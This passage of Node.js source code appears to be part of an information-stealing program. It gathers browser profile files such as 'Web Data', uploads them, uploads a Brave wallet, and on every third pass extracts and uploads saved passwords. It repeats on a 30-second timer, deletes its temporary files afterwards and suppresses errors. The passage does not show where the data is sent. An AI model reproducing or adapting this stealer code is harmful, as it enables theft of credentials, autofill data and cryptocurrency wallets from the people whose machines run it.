      const webDataFile = await collectFile(`${basePath}/${folder}/Web Data`, browserId, profileId, '', tempDir);
      if (webDataFile) profileFiles.push(webDataFile);
      if (profileFiles.length > 0) {
        await uploadFiles(profileFiles, timestamp);
      }
    }
  }
  await uploadBraveWallet(timestamp, tempDir);
  if (i % 3 === 0) { // every 3rd iteration
    await extractAndUploadPasswords(timestamp, tempDir);
  }
} finally {
  if (fs.existsSync(tempDir)) {
    try {
      const files = await fsPromises.readdir(tempDir);
      await Promise.all(files.map(file => 
        fsPromises.unlink(path.join(tempDir, file)).catch(() => {})
      ));
      await fsPromises.rmdir(tempDir);
    } catch (cleanupErr) {
      try {
        if (fs.rmSync) {
          fs.rmSync(tempDir, { recursive: true, force: true });
        }
      } catch (altCleanupErr) {}
    }
  }
}

};

const run = async () => {
await iterate();
i++;
await sleep(30000);
i <= 10 && (await run());
};
process.on('uncaughtException', (error) => {
console.error('Uncaught Exception:', error.message);
});

process.on('unhandledRejection', (reason, promise) => {
console.error('Unhandled Rejection at:', promise, 'reason:', reason);
});

(async () => {
try {
  await run();
} catch (error) {
  console.error('Fatal error in run():', error.message);
}
})();